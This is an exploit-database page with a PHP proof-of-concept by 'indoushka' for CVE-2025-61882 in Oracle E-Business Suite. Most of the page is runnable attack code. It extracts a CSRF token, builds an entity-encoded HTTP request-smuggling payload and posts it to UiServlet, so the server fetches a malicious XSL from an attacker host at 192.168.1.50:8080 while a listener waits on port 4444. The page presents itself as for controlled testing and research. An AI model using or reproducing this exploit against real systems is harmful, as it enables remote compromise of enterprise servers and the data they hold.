Share
## https://sploitus.com/exploit?id=PACKETSTORM:214643
=============================================================================================================================================
    | # Title     : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.oracle.com/applications/ebusiness/                                                                              |
    =============================================================================================================================================
    
    [+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882
    
    [+] Summary: This script is a refined proof-of-concept targeting Oracle E‑Business Suite (EBS) vulnerability CVE‑2025‑61882. 
                 It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization. 
    			 The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body. 
    			 Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure. 
                 The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.
    
    [+] POC : php poc.php 
    
    <?php
    
    class OracleEBSCVE202561882Exploit {
        private $target;
        private $targetPort = 8000;
        private $srvHost;
        private $srvPort;
        private $lhost;
        private $lport;
        private $verbose = false;
        private $cookies = [];
        private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
        private $useHttps = false;
    
        public function __construct($options) {
            $this->target   = $options['target'] ?? null;
            $this->lhost    = $options['lhost'] ?? null;
            $this->lport    = $options['lport'] ?? null;
            $this->srvHost  = $options['srvHost'] ?? '127.0.0.1';
            $this->srvPort  = $options['srvPort'] ?? 8080;
            $this->verbose  = $options['verbose'] ?? false;
    
            if ($this->target) {
                $parsed = parse_url($this->target);
                if ($parsed !== false) {
                    $scheme = $parsed['scheme'] ?? 'http';
                    $this->useHttps = ($scheme === 'https');
                    $this->target = $parsed['host'] ?? $this->target;
                    $this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);
                }
            }
        }
    
        private function retrieveCsrfTokenImproved() {
            $url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
            $headers = [
                'CSRF-XHR: YES',
                'FETCH-CSRF-TOKEN: 1',
                'X-Requested-With: XMLHttpRequest'
            ];
    
            $response = $this->httpRequest('POST', $url, '', $headers, true);
    
            if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
                return trim($m[1]);
            }
    
            if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
                return $m[1];
            }
    
            return false;
        }
    
        private function createSmugglePayloadImproved($xslUrl) {
            $parsedXsl = parse_url($xslUrl);
            $xslHost = $parsedXsl['host'] ?? $this->srvHost;
            $xslPath = $parsedXsl['path'] ?? '/payload.xsl';
            $smuggled  = "GET {$xslPath} HTTP/1.1\r\n";
            $smuggled .= "Host: {$xslHost}\r\n";
            $smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
            $smuggled .= "Connection: keep-alive\r\n\r\n";
            $payload  = "0\r\n\r\n";
            $payload .= $smuggled;
    
            return $this->encodeSmugglePayload($payload);
        }
    
        private function encodeSmugglePayload($payload) {
            $encoded = '';
            $len = strlen($payload);
            for ($i = 0; $i < $len; $i++) {
                $c = $payload[$i];
                if ($c === "\r" || $c === "\n") {
                    $encoded .= $c;
                } else {
                    $encoded .= '&#' . ord($c) . ';';
                }
            }
            return $encoded;
        }
    
        public function exploit() {
            $this->log("Attempting to retrieve CSRF token...", "info");
            $token = $this->retrieveCsrfTokenImproved();
    
            if (!$token) {
                $this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
            }
    
            $xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
            $smuggleData = $this->createSmugglePayloadImproved($xslUrl);
            $xml  = "<?xml version='1.0' encoding='UTF-8'?>";
            $xml .= "<initialize>";
            $xml .= "<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>";
            $xml .= "<param name='ui_type'>Applet</param>";
            $xml .= "</initialize>";
    
            $url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
            $postData = http_build_query([
                'redirectFromJsp' => '1',
                'getUiType'      => $xml,
                'oa_csrf_token'  => $token
            ]);
    
            $this->log("Sending smuggling payload to UiServlet...", "info");
            $this->httpRequest('POST', $url, $postData, [
                'Content-Type: application/x-www-form-urlencoded'
            ]);
    
            $this->log("Payload sent. Monitor your HTTP server and listener.", "success");
        }
    
        private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {
            $ch = curl_init($url);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_CUSTOMREQUEST  => $method,
                CURLOPT_HEADER         => $returnFull,
                CURLOPT_HTTPHEADER     => array_merge(
                    ["User-Agent: {$this->userAgent}"],
                    $headers
                )
            ]);
    
            if ($method === 'POST') {
                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function buildUrl($path) {
            $scheme = $this->useHttps ? 'https' : 'http';
            return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
        }
    
        private function log($msg, $type) {
            echo "[{$type}] {$msg}\n";
        }
    }
    
    $options = [
        'target'  => 'http://192.168.1.100:8000',
        'lhost'   => '192.168.1.50',
        'lport'   => 4444,
        'srvHost' => '192.168.1.50',
        'srvPort' => 8080
    ];
    
    $exploit = new OracleEBSCVE202561882Exploit($options);
    $exploit->exploit();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================